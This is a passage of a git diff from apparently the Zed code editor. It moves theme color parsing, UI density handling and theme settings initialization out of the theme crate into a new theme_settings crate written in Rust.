+ .predictive_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + renamed: colors + .renamed + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + renamed_background: colors + .renamed_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + renamed_border: colors + .renamed_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + success: colors + .success + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + success_background: colors + .success_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + success_border: colors + .success_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + unreachable: colors + .unreachable + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + unreachable_background: colors + .unreachable_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + unreachable_border: colors + .unreachable_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + warning: colors + .warning + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + warning_background: colors + .warning_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + warning_border: colors + .warning_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + } +} + +pub fn theme_colors_refinement( + this: &settings::ThemeColorsContent, + status_colors: &StatusColorsRefinement, +) -> ThemeColorsRefinement { + let border = this + .border + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let editor_document_highlight_read_background = this + .editor_document_highlight_read_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let scrollbar_thumb_background = this + .scrollbar_thumb_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or_else(|| { + this.deprecated_scrollbar_thumb_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + }); + let scrollbar_thumb_hover_background = this + .scrollbar_thumb_hover_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let scrollbar_thumb_active_background = this + .scrollbar_thumb_active_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_background); + let scrollbar_thumb_border = this + .scrollbar_thumb_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let element_hover = this + .element_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let panel_background = this + .panel_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let search_match_background = this + .search_match_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let search_active_match_background = this + .search_active_match_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(search_match_background); + ThemeColorsRefinement { + border, + border_variant: this + .border_variant + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_focused: this + .border_focused + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_selected: this + .border_selected + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_transparent: this + .border_transparent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + border_disabled: this + .border_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + elevated_surface_background: this + .elevated_surface_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + surface_background: this + .surface_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + background: this + .background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_background: this + .element_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_hover, + element_active: this + .element_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_selected: this + .element_selected + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_disabled: this + .element_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + element_selection_background: this + .element_selection_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + drop_target_background: this + .drop_target_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + drop_target_border: this + .drop_target_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_background: this + .ghost_element_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_hover: this + .ghost_element_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_active: this + .ghost_element_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_selected: this + .ghost_element_selected + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + ghost_element_disabled: this + .ghost_element_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text: this + .text + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_muted: this + .text_muted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_placeholder: this + .text_placeholder + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_disabled: this + .text_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + text_accent: this + .text_accent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon: this + .icon + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_muted: this + .icon_muted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_disabled: this + .icon_disabled + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_placeholder: this + .icon_placeholder + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + icon_accent: this + .icon_accent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + debugger_accent: this + .debugger_accent + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + status_bar_background: this + .status_bar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + title_bar_background: this + .title_bar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + title_bar_inactive_background: this + .title_bar_inactive_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + toolbar_background: this + .toolbar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + tab_bar_background: this + .tab_bar_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + tab_inactive_background: this + .tab_inactive_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + tab_active_background: this + .tab_active_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + search_match_background, + search_active_match_background, + panel_background, + panel_focused_border: this + .panel_focused_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_indent_guide: this + .panel_indent_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_indent_guide_hover: this + .panel_indent_guide_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_indent_guide_active: this + .panel_indent_guide_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + panel_overlay_background: this + .panel_overlay_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(panel_background.map(ensure_opaque)), + panel_overlay_hover: this + .panel_overlay_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(panel_background + .zip(element_hover) + .map(|(panel_bg, hover_bg)| panel_bg.blend(hover_bg)) + .map(ensure_opaque)), + pane_focused_border: this + .pane_focused_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + pane_group_border: this + .pane_group_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(border), + scrollbar_thumb_background, + scrollbar_thumb_hover_background, + scrollbar_thumb_active_background, + scrollbar_thumb_border, + scrollbar_track_background: this + .scrollbar_track_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + scrollbar_track_border: this + .scrollbar_track_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + minimap_thumb_background: this + .minimap_thumb_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_background.map(ensure_non_opaque)), + minimap_thumb_hover_background: this + .minimap_thumb_hover_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_hover_background.map(ensure_non_opaque)), + minimap_thumb_active_background: this + .minimap_thumb_active_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_active_background.map(ensure_non_opaque)), + minimap_thumb_border: this + .minimap_thumb_border + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(scrollbar_thumb_border), + editor_foreground: this + .editor_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_background: this + .editor_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_gutter_background: this + .editor_gutter_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_subheader_background: this + .editor_subheader_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_active_line_background: this + .editor_active_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_highlighted_line_background: this + .editor_highlighted_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_debugger_active_line_background: this + .editor_debugger_active_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_line_number: this + .editor_line_number + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_hover_line_number: this + .editor_hover_line_number + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_active_line_number: this + .editor_active_line_number + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_invisible: this + .editor_invisible + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_wrap_guide: this + .editor_wrap_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_active_wrap_guide: this + .editor_active_wrap_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_indent_guide: this + .editor_indent_guide + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_indent_guide_active: this + .editor_indent_guide_active + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_document_highlight_read_background, + editor_document_highlight_write_background: this + .editor_document_highlight_write_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + editor_document_highlight_bracket_background: this + .editor_document_highlight_bracket_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(editor_document_highlight_read_background), + terminal_background: this + .terminal_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_background: this + .terminal_ansi_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_foreground: this + .terminal_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_bright_foreground: this + .terminal_bright_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_dim_foreground: this + .terminal_dim_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_black: this + .terminal_ansi_black + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_black: this + .terminal_ansi_bright_black + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_black: this + .terminal_ansi_dim_black + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_red: this + .terminal_ansi_red + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_red: this + .terminal_ansi_bright_red + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_red: this + .terminal_ansi_dim_red + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_green: this + .terminal_ansi_green + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_green: this + .terminal_ansi_bright_green + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_green: this + .terminal_ansi_dim_green + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_yellow: this + .terminal_ansi_yellow + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_yellow: this + .terminal_ansi_bright_yellow + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_yellow: this + .terminal_ansi_dim_yellow + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_blue: this + .terminal_ansi_blue + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_blue: this + .terminal_ansi_bright_blue + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_blue: this + .terminal_ansi_dim_blue + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_magenta: this + .terminal_ansi_magenta + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_magenta: this + .terminal_ansi_bright_magenta + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_magenta: this + .terminal_ansi_dim_magenta + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_cyan: this + .terminal_ansi_cyan + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_cyan: this + .terminal_ansi_bright_cyan + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_cyan: this + .terminal_ansi_dim_cyan + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_white: this + .terminal_ansi_white + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_bright_white: this + .terminal_ansi_bright_white + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + terminal_ansi_dim_white: this + .terminal_ansi_dim_white + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + link_text_hover: this + .link_text_hover + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + version_control_added: this + .version_control_added + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.created), + version_control_deleted: this + .version_control_deleted + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.deleted), + version_control_modified: this + .version_control_modified + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.modified), + version_control_renamed: this + .version_control_renamed + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.modified), + version_control_conflict: this + .version_control_conflict + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.ignored), + version_control_ignored: this + .version_control_ignored + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(status_colors.ignored), + version_control_word_added: this + .version_control_word_added + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + version_control_word_deleted: this + .version_control_word_deleted + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + #[allow(deprecated)] + version_control_conflict_marker_ours: this + .version_control_conflict_marker_ours + .as_ref() + .or(this.version_control_conflict_ours_background.as_ref()) + .and_then(|color| try_parse_color(color).ok()), + #[allow(deprecated)] + version_control_conflict_marker_theirs: this + .version_control_conflict_marker_theirs + .as_ref() + .or(this.version_control_conflict_theirs_background.as_ref()) + .and_then(|color| try_parse_color(color).ok()), + vim_normal_background: this + .vim_normal_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_insert_background: this + .vim_insert_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_replace_background: this + .vim_replace_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_background: this + .vim_visual_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_line_background: this + .vim_visual_line_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_block_background: this + .vim_visual_block_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_yank_background: this + .vim_yank_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + .or(editor_document_highlight_read_background), + vim_helix_normal_background: this + .vim_helix_normal_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_helix_select_background: this + .vim_helix_select_background + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_normal_foreground: this + .vim_normal_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_insert_foreground: this + .vim_insert_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_replace_foreground: this + .vim_replace_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_foreground: this + .vim_visual_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_line_foreground: this + .vim_visual_line_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_visual_block_foreground: this + .vim_visual_block_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_helix_normal_foreground: this + .vim_helix_normal_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + vim_helix_select_foreground: this + .vim_helix_select_foreground + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + } +} + +fn ensure_non_opaque(color: Hsla) -> Hsla { + const MAXIMUM_OPACITY: f32 = 0.7; + if color.a <= MAXIMUM_OPACITY { + color + } else { + Hsla { + a: MAXIMUM_OPACITY, + ..color + } + } +} + +fn ensure_opaque(color: Hsla) -> Hsla { + Hsla { a: 1.0, ..color } +} + +fn try_parse_color(color: &str) -> anyhow::Result { + let rgba = gpui::Rgba::try_from(color)?; + let rgba = palette::rgb::Srgba::from_components((rgba.r, rgba.g, rgba.b, rgba.a)); + let hsla = palette::Hsla::from_color(rgba); + + let hsla = gpui::hsla( + hsla.hue.into_positive_degrees() / 360., + hsla.saturation, + hsla.lightness, + hsla.alpha, + ); + + Ok(hsla) +} diff --git a/crates/theme/src/settings.rs b/crates/theme_settings/src/settings.rs similarity index 83% rename from crates/theme/src/settings.rs rename to crates/theme_settings/src/settings.rs index a092e2698722a980f0b2a4b5ea64b9bfa0f33d01..cda63ab9c8aa10d0f006f3bf371aab6491dff6de 100644 --- a/crates/theme/src/settings.rs +++ b/crates/theme_settings/src/settings.rs @@ -1,9 +1,8 @@ -use crate::{ - Appearance, DEFAULT_ICON_THEME_NAME, SyntaxTheme, Theme, status_colors_refinement, - syntax_overrides, theme_colors_refinement, -}; +#![allow(missing_docs)] + +use crate::schema::{status_colors_refinement, syntax_overrides, theme_colors_refinement}; +use crate::{merge_accent_colors, merge_player_colors}; use collections::HashMap; -use derive_more::{Deref, DerefMut}; use gpui::{ App, Context, Font, FontFallbacks, FontStyle, Global, Pixels, Subscription, Window, px, }; @@ -13,82 +12,24 @@ use serde::{Deserialize, Serialize}; pub use settings::{FontFamilyName, IconThemeName, ThemeAppearanceMode, ThemeName}; use settings::{IntoGpui, RegisterSetting, Settings, SettingsContent}; use std::sync::Arc; +use theme::{Appearance, DEFAULT_ICON_THEME_NAME, SyntaxTheme, Theme, UiDensity}; const MIN_FONT_SIZE: Pixels = px(6.0); const MAX_FONT_SIZE: Pixels = px(100.0); const MIN_LINE_HEIGHT: f32 = 1.0; -#[derive( - Debug, - Default, - PartialEq, - Eq, - PartialOrd, - Ord, - Hash, - Clone, - Copy, - Serialize, - Deserialize, - JsonSchema, -)] - -/// Specifies the density of the UI. -/// Note: This setting is still experimental. See [this tracking issue](https://github.com/zed-industries/zed/issues/18078) -#[serde(rename_all = "snake_case")] -pub enum UiDensity { - /// A denser UI with tighter spacing and smaller elements. - #[serde(alias = "compact")] - Compact, - #[default] - #[serde(alias = "default")] - /// The default UI density. - Default, - #[serde(alias = "comfortable")] - /// A looser UI with more spacing and larger elements. - Comfortable, -} - -impl UiDensity { - /// The spacing ratio of a given density. - /// TODO: Standardize usage throughout the app or remove - pub fn spacing_ratio(self) -> f32 { - match self { - UiDensity::Compact => 0.75, - UiDensity::Default => 1.0, - UiDensity::Comfortable => 1.25, - } - } -} - -impl From for UiDensity { - fn from(s: String) -> Self { - match s.as_str() { - "compact" => Self::Compact, - "default" => Self::Default, - "comfortable" => Self::Comfortable, - _ => Self::default(), - } - } -} - -impl From for String { - fn from(val: UiDensity) -> Self { - match val { - UiDensity::Compact => "compact".to_string(), - UiDensity::Default => "default".to_string(), - UiDensity::Comfortable => "comfortable".to_string(), - } +pub(crate) fn ui_density_from_settings(val: settings::UiDensity) -> UiDensity { + match val { + settings::UiDensity::Compact => UiDensity::Compact, + settings::UiDensity::Default => UiDensity::Default, + settings::UiDensity::Comfortable => UiDensity::Comfortable, } } -impl From for UiDensity { - fn from(val: settings::UiDensity) -> Self { - match val { - settings::UiDensity::Compact => Self::Compact, - settings::UiDensity::Default => Self::Default, - settings::UiDensity::Comfortable => Self::Comfortable, - } +pub fn appearance_to_mode(appearance: Appearance) -> ThemeAppearanceMode { + match appearance { + Appearance::Light => ThemeAppearanceMode::Light, + Appearance::Dark => ThemeAppearanceMode::Dark, } } @@ -145,39 +86,6 @@ pub fn default_theme(appearance: Appearance) -> &'static str { } } -/// The appearance of the system. -#[derive(Debug, Clone, Copy, Deref)] -pub struct SystemAppearance(pub Appearance); - -impl Default for SystemAppearance { - fn default() -> Self { - Self(Appearance::Dark) - } -} - -#[derive(Deref, DerefMut, Default)] -struct GlobalSystemAppearance(SystemAppearance); - -impl Global for GlobalSystemAppearance {} - -impl SystemAppearance { - /// Initializes the [`SystemAppearance`] for the application. - pub fn init(cx: &mut App) { - *cx.default_global::() = - GlobalSystemAppearance(SystemAppearance(cx.window_appearance().into())); - } - - /// Returns the global [`SystemAppearance`]. - pub fn global(cx: &App) -> Self { - cx.global::().0 - } - - /// Returns a mutable reference to the global [`SystemAppearance`]. - pub fn global_mut(cx: &mut App) -> &mut Self { - cx.global_mut::() - } -} - #[derive(Default)] struct BufferFontSize(Pixels); @@ -327,21 +235,16 @@ pub fn set_theme( *theme = theme_name; } settings::ThemeSelection::Dynamic { mode, light, dark } => { - // Update the appropriate theme slot based on appearance. match theme_appearance { Appearance::Light => *light = theme_name, Appearance::Dark => *dark = theme_name, } - // Don't update the theme mode if it is set to system and the new theme has the same - // appearance. let should_update_mode = !(mode == &ThemeAppearanceMode::System && theme_appearance == system_appearance); if should_update_mode { - // Update the mode to the specified appearance (otherwise we might set the theme and - // nothing gets updated because the system specified the other mode appearance). - *mode = ThemeAppearanceMode::from(theme_appearance); + *mode = appearance_to_mode(theme_appearance); } } } @@ -378,14 +281,11 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) { if let Some(selection) = theme.theme.as_mut() { match selection { - settings::ThemeSelection::Static(theme) => { - // If the theme was previously set to a single static theme, - // we don't know whether it was a light or dark theme, so we - // just use it for both. + settings::ThemeSelection::Static(_) => { *selection = settings::ThemeSelection::Dynamic { - mode, - light: theme.clone(), - dark: theme.clone(), + mode: ThemeAppearanceMode::System, + light: ThemeName(settings::DEFAULT_LIGHT_THEME.into()), + dark: ThemeName(settings::DEFAULT_DARK_THEME.into()), }; } settings::ThemeSelection::Dynamic { @@ -404,9 +304,6 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) { if let Some(selection) = theme.icon_theme.as_mut() { match selection { settings::IconThemeSelection::Static(icon_theme) => { - // If the icon theme was previously set to a single static - // theme, we don't know whether it was a light or dark - // theme, so we just use it for both. *selection = settings::IconThemeSelection::Dynamic { mode, light: icon_theme.clone(), @@ -424,7 +321,6 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) { ))); } } -// } /// The buffer's line height. #[derive(Clone, Copy, Debug, PartialEq, Default)] @@ -530,7 +426,6 @@ impl ThemeSettings { self.agent_buffer_font_size } - // TODO: Rename: `line_height` -> `buffer_line_height` /// Returns the buffer's line height. pub fn line_height(&self) -> f32 { f32::max(self.buffer_line_height.value(), MIN_LINE_HEIGHT) @@ -538,7 +433,6 @@ impl ThemeSettings { /// Applies the theme overrides, if there are any, to the current theme. pub fn apply_theme_overrides(&self, mut arc_theme: Arc) -> Arc { - // Apply the old overrides setting first, so that the new setting can override those. if let Some(experimental_theme_overrides) = &self.experimental_theme_overrides { let mut theme = (*arc_theme).clone(); ThemeSettings::modify_theme(&mut theme, experimental_theme_overrides); @@ -566,11 +460,11 @@ impl ThemeSettings { &status_color_refinement, )); base_theme.styles.status.refine(&status_color_refinement); - base_theme.styles.player.merge(&theme_overrides.players); - base_theme.styles.accents.merge(&theme_overrides.accents); + merge_player_colors(&mut base_theme.styles.player, &theme_overrides.players); + merge_accent_colors(&mut base_theme.styles.accents, &theme_overrides.accents); base_theme.styles.syntax = SyntaxTheme::merge( base_theme.styles.syntax.clone(), - syntax_overrides(&theme_overrides), + syntax_overrides(theme_overrides), ); } } @@ -614,7 +508,6 @@ pub fn reset_buffer_font_size(cx: &mut App) { } } -// TODO: Make private, change usages to use `get_ui_font_size` instead. #[allow(missing_docs)] pub fn setup_ui_font(window: &mut Window, cx: &mut App) -> gpui::Font { let (ui_font, ui_font_size) = { @@ -734,7 +627,7 @@ impl settings::Settings for ThemeSettings { experimental_theme_overrides: content.experimental_theme_overrides.clone(), theme_overrides: content.theme_overrides.clone(), icon_theme: icon_theme_selection, - ui_density: content.ui_density.unwrap_or_default().into(), + ui_density: ui_density_from_settings(content.ui_density.unwrap_or_default()), unnecessary_code_fade: content.unnecessary_code_fade.unwrap().0.clamp(0.0, 0.9), } } diff --git a/crates/theme_settings/src/theme_settings.rs b/crates/theme_settings/src/theme_settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..f5bc96ba02a63088b6311055899b39de65ea9de2 --- /dev/null +++ b/crates/theme_settings/src/theme_settings.rs @@ -0,0 +1,412 @@ +#![deny(missing_docs)] + +//! # Theme Settings +//! +//! This crate provides theme settings integration for Zed, +//! bridging the theme system with the settings infrastructure. + +mod schema; +mod settings; + +use std::sync::Arc; + +use ::settings::{IntoGpui, Settings, SettingsStore}; +use anyhow::{Context as _, Result}; +use gpui::{App, Font, HighlightStyle, Pixels, Refineable}; +use gpui_util::ResultExt; +use theme::{ + AccentColors, Appearance, AppearanceContent, DEFAULT_DARK_THEME, DEFAULT_ICON_THEME_NAME, + GlobalTheme, LoadThemes, PlayerColor, PlayerColors, StatusColors, SyntaxTheme, + SystemAppearance, SystemColors, Theme, ThemeColors, ThemeFamily, ThemeRegistry, + ThemeSettingsProvider, ThemeStyles, default_color_scales, try_parse_color, +}; + +pub use crate::schema::{ + FontStyleContent, FontWeightContent, HighlightStyleContent, StatusColorsContent, + ThemeColorsContent, ThemeContent, ThemeFamilyContent, ThemeStyleContent, + WindowBackgroundContent, status_colors_refinement, syntax_overrides, theme_colors_refinement, +}; +pub use crate::settings::{ + AgentFontSize, BufferLineHeight, FontFamilyName, IconThemeName, IconThemeSelection, + ThemeAppearanceMode, ThemeName, ThemeSelection, ThemeSettings, adjust_agent_buffer_font_size, + adjust_agent_ui_font_size, adjust_buffer_font_size, adjust_ui_font_size, adjusted_font_size, + appearance_to_mode, clamp_font_size, default_theme, observe_buffer_font_size_adjustment, + reset_agent_buffer_font_size, reset_agent_ui_font_size, reset_buffer_font_size, + reset_ui_font_size, set_icon_theme, set_mode, set_theme, setup_ui_font, +}; +pub use theme::UiDensity; + +struct ThemeSettingsProviderImpl; + +impl ThemeSettingsProvider for ThemeSettingsProviderImpl { + fn ui_font<'a>(&'a self, cx: &'a App) -> &'a Font { + &ThemeSettings::get_global(cx).ui_font + } + + fn buffer_font<'a>(&'a self, cx: &'a App) -> &'a Font { + &ThemeSettings::get_global(cx).buffer_font + } + + fn ui_font_size(&self, cx: &App) -> Pixels { + ThemeSettings::get_global(cx).ui_font_size(cx) + } + + fn buffer_font_size(&self, cx: &App) -> Pixels { + ThemeSettings::get_global(cx).buffer_font_size(cx) + } + + fn ui_density(&self, cx: &App) -> UiDensity { + ThemeSettings::get_global(cx).ui_density + } +} + +/// Initialize the theme system with settings integration. +/// +/// This is the full initialization for the application. It calls [`theme::init`] +/// and then wires up settings observation for theme/font changes. +pub fn init(themes_to_load: LoadThemes, cx: &mut App) { + let load_user_themes = matches!(&themes_to_load, LoadThemes::All(_)); + + theme::init(themes_to_load, cx); + theme::set_theme_settings_provider(Box::new(ThemeSettingsProviderImpl), cx); + + if load_user_themes { + let registry = ThemeRegistry::global(cx); + load_bundled_themes(®istry); + } + + let theme = configured_theme(cx); + let icon_theme = configured_icon_theme(cx); + GlobalTheme::update_theme(cx, theme); + GlobalTheme::update_icon_theme(cx, icon_theme); + + let settings = ThemeSettings::get_global(cx); + + let mut prev_buffer_font_size_settings = settings.buffer_font_size_settings(); + let mut prev_ui_font_size_settings = settings.ui_font_size_settings(); + let mut prev_agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); + let mut prev_agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); + let mut prev_theme_name = settings.theme.name(SystemAppearance::global(cx).0); + let mut prev_icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); + let mut prev_theme_overrides = ( + settings.experimental_theme_overrides.clone(), + settings.theme_overrides.clone(), + ); + + cx.observe_global::(move |cx| { + let settings = ThemeSettings::get_global(cx); + + let buffer_font_size_settings = settings.buffer_font_size_settings(); + let ui_font_size_settings = settings.ui_font_size_settings(); + let agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); + let agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); + let theme_name = settings.theme.name(SystemAppearance::global(cx).0); + let icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); + let theme_overrides = ( + settings.experimental_theme_overrides.clone(), + settings.theme_overrides.clone(), + ); + + if buffer_font_size_settings != prev_buffer_font_size_settings { + prev_buffer_font_size_settings = buffer_font_size_settings; + reset_buffer_font_size(cx); + } + + if ui_font_size_settings != prev_ui_font_size_settings { + prev_ui_font_size_settings = ui_font_size_settings; + reset_ui_font_size(cx); + } + + if agent_ui_font_size_settings != prev_agent_ui_font_size_settings { + prev_agent_ui_font_size_settings = agent_ui_font_size_settings; + reset_agent_ui_font_size(cx); + } + + if agent_buffer_font_size_settings != prev_agent_buffer_font_size_settings { + prev_agent_buffer_font_size_settings = agent_buffer_font_size_settings; + reset_agent_buffer_font_size(cx); + } + + if theme_name != prev_theme_name || theme_overrides != prev_theme_overrides { + prev_theme_name = theme_name; + prev_theme_overrides = theme_overrides; + reload_theme(cx); + } + + if icon_theme_name != prev_icon_theme_name { + prev_icon_theme_name = icon_theme_name; + reload_icon_theme(cx); + } + }) + .detach(); +} + +fn configured_theme(cx: &mut App) -> Arc { + let themes = ThemeRegistry::default_global(cx); + let theme_settings = ThemeSettings::get_global(cx); + let system_appearance = SystemAppearance::global(cx); + + let theme_name = theme_settings.theme.name(*system_appearance); + + let theme = match themes.get(&theme_name.0) { + Ok(theme) => 